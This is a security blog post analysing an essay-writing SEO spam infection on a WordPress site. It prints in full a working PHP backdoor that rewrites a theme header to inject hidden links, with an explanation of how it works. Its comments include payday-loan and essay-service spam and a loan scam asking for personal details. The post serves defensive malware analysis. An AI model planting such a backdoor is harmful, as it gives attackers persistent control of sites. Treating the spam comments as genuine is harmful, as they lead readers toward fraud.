• Skip to primary navigation
  • Skip to content
  • Skip to primary sidebar
  • Skip to footer

Sucuri Blog

Website Security News

  • Products
    • Website Security Platform
    • Website Firewall (WAF)
    • Enterprise Website Security
    • Multisite Solutions
  • Features
    • Detection
    • Protection
    • Performance
    • Response
    • Backups
  • Partners
    • Agency Solutions
    • Partners
    • Referral Program
    • Ecommerce
  • Resources
    • Guides
    • Webinars
    • Infographics
    • SiteCheck
    • Reports
    • Email Courses
  • Immediate Help
  • Login

Not Just Pills or Payday Loans, It’s Essay SEO SPAM!

February 14, 2014Estevao Avillez

FacebookTwitterSubscribe

Essay SEO SPAM
Remember back in school or college when you had to write pages and pages of long essays, but had no time to write them? Or maybe you were just too lazy? Yeah, good times. Well, it seems like some companies are trying to end this problem. They are offering services where clients pay them to write these essays for you.

The problem is this is not only wrong, but it’s also becoming a competitive market where some companies are leveraging SEO spam to gain better rankings on search engines (i.e., Google, Bing). They are also using popular sites like bleacherreport.com and joomlacode.org to add their spam links.

Here are a couple example URL’s from sites that got hit (URL’s are still showing spam):

  • httx://bleacherreport .com/users/4065601-community-service-essays
  • httx://joomlacode .org/gf/download/trackeritem/32806/131536/online-academic-writers.html

If you think you have seen all kinds of SEO spam, think again. We just found a new one: the Essay SEO spam.

How Did We Find It?

Easy, our free malware scanner SiteCheck was flagging a website as infected.

This was the payload:

SiteCheck

At first, it appeared to be a false positive, but then I realized that this was an engineering website and this “paper writing services” content couldn’t possibly have anything to do with it.

After checking out some of the flagged links I got to this “final” website: httx://www.paperhelp .org/order.html. We are not implying they are behind the attacks, but it wouldn’t be a stretch of the imagination to think that they likely hired an SEO company ,and that company could be using extremely blackhat techniques.

Who knows…

Where Was This Infection?

What got my attention was this tag at the beginning of the code:
"<div id="links-s" style="position:absolute; top:-4290px;">"
This is usually related with dynamic content placed in the header of the file. So, yes, in this case it was located on this page:
"./wp-content/themes/display/header.php"

How Did It Get Injected?

While cleaning the the website we found a backdoor that was inserted into this file: ./wp-blog-header.php:

if (isset($_POST['link'])){
$f_p=explode("<>",$_POST['link']);
$link='';
foreach ($f_p as $f){
$f_a=explode("|",$f);
$link.='<a href="'.$f_a[0].'">'.$f_a[1].'</a>'.$f_a[2].' ';
}
$link_div='<div id="links-s" style="position:absolute; top:-4290px;">'.$link.'</div>';
$heder="wp-content/themes/display/header.php";
$p=file_get_contents($heder);
if (preg_match('|(<div id="links-s".*?</div>)|s',$p)){ $p=preg_replace('|(<div id="links-s".*?</div>)|s','',$p);}
preg_match('|(<body.*>)s|',$p,$bodys);
$body=$bodys[1]." ".$link_div;
$p_n=preg_replace('|(<body.*>)s|',"$body",$p);
$fp = fopen($heder, 'w');fwrite($fp, $p_n);fclose($fp);
echo "succes";
}

I am not a developer so I asked one of our developers (Ante Kresic) how this backdoor worked, and here is his explanation:

This backdoor was inserted in the wp-blog-header.php file, which is the first file that is read in WordPress, so this works on the whole site. The $_POST[‘link’] gives permission to add content in a website, in this specific case, it was added in the header.php file:

$heder="wp-content/themes/display/header.php";

So basically, the hacker is sending a payload using this post variable ‘link’, filled with ‘<>’ and ‘|’ characters written in a specific format. These are separated into multiple entries and they all show up in the header.php file, printed out as “succes” :

echo "succes";

The irony in the entire story could be traced back to a simple indicator that something was wrong. These attackers were advertising essay writing services using words like “heder” and “succes”.


Have you run into any sites with similar scams or spam? If you’re not sure if your site, or one you’re visiting is infected, run a free malware scan. If you need help cleaning up a site, check out Sucuri cleanup services.

FacebookTwitterSubscribe

Categories: Joomla Security, Website SecurityTags: Malware Updates, SEO Spam

About Estevao Avillez

Estevao Avillez is Sucuri’s Senior Director of Security Research, who joined the company in 2013. Estevao’s main responsibilities include leading the Research Group, which includes the Malware, Vulnerability and WAF/Sucuri Infrastructure. His professional experience covers 15 years with planning, project and operations management. Estevao has also worked in various areas such as logistics and supply chain, media and communication, telecommunications, and trading relationships with customers. He’s worked as a consultant in financial, strategic and operational management. When Estevao isn’t keeping our customers safe, you might find him taking care of his kids and running. Connect with him on Twitter.

Reader Interactions

Comments

  1. Jim Walker

    February 15, 2014

    Nicely written Estevao Avillez. Thank you for the excellent SEO spam summary.

  2. Sunayna Gupta

    February 17, 2014

    Oh my-my these spammers always come out with something challenging to cope up with. I love this feel of winning over them.

  3. PATRICIA

    March 21, 2014

    MUY BUENA INVESTIGACION

  4. CARLOS

    March 28, 2014

    SON DATOS MUY PRECISOS A TENER ENCUENTA

  5. Maria johns

    April 9, 2014

    I am fully satisfy with your thoughts. These spammer doing always Something challenging. I am Loved it. And thanks for sharing this useful information with us.

  6. Warren Stephen

    July 15, 2014

    Getting an online loan was never so easy according to me. Payday loan is the best option to overcome your instant financial problem. You can get payday loan online with in 24 hours @ Fast Payday Cash Advance Loans

  7. Mia Vance Mia Vance

    March 29, 2015

    Your essay is spot on and well thought out. I can’t imagine all the
    comments you moderate! I don’t know why people feel the need to attack
    others. Just because you don’t agree with that particular style or
    choice does not give that person the right to attack. Why can’t we
    simply just stay quiet or say–wow that’s an interesting set up / idea /
    display, etc. We have this lovely and beautiful world we live in and
    should be able to enjoy all the different parts that make it unique.
    Oy-I could go on forever….


    custom essay writing uk

  8. nabilmubarak

    July 15, 2016

    With Gain Credit Personal Loans, you can get instant loan/money for a wide range of your personal needs like renovation of your home, marriage in the family, a family holiday, your child’s education, buying a house, medical expenses or any other emergencies. With minimum documentation, you can now avail a personal loan at attractive 3% interest rates. This is trust and honest loans which you will not regret, Contact us via Email: gaincreditloan01@gmail.com

    Your Full Details:
    Full Name. . .. . .. . .. . .. . .
    Loan Amount Needed. . …
    Loan Duration. . .. . .. . .. . .
    Phone Number. . .. . .. . ..
    Applied before. . .. . .. . ..
    Country. . .. . .
    Email Us: gaincreditloan01@gmail.com

  9. Tiffany C. Mashburn

    August 12, 2017

    With essay writing service uk, you can get exactly what you want with no compromise and delay. I’m saying this because they are expert in their work and know how to write the work. They have very skilled writers which first research the topic deeply and write it.

Primary Sidebar

Socialize With Sucuri

We're actively engaged across multiple platforms. Follow us and let's connect!

  • Facebook
  • Twitter
  • LinkedIn
  • YouTube
  • Instagram
  • RSS Feed

Join Over 20,000 Subscribers!

Sucuri Sidebar Malware Removal to Signup Page

Footer

Products

  • Website Firewall
  • Website AntiVirus
  • Website Backups
  • WordPress Security
  • Enterprise Services

Solutions

  • DDos Protection
  • Malware Detection
  • Malware Removal
  • Malware Prevention
  • Blacklist Removal

Support

  • Blog
  • Knowledge Base
  • SiteCheck
  • Research Labs
  • FAQ

Company

  • About
  • Media
  • Events
  • Employment
  • Contact
  • Testimonials
  • Facebook
  • Twitter
  • LinkedIn
  • Instagram

Customer Login

Sucuri Home

  • Terms of Use
  • Privacy Policy
  • Frequently Asked Questions

© 2023 Sucuri Inc. All rights reserved

Sucuri Cookie Policy
See our policy>>

Our website uses cookies, which help us to improve our site and enables us to deliver the best possible service and customer experience.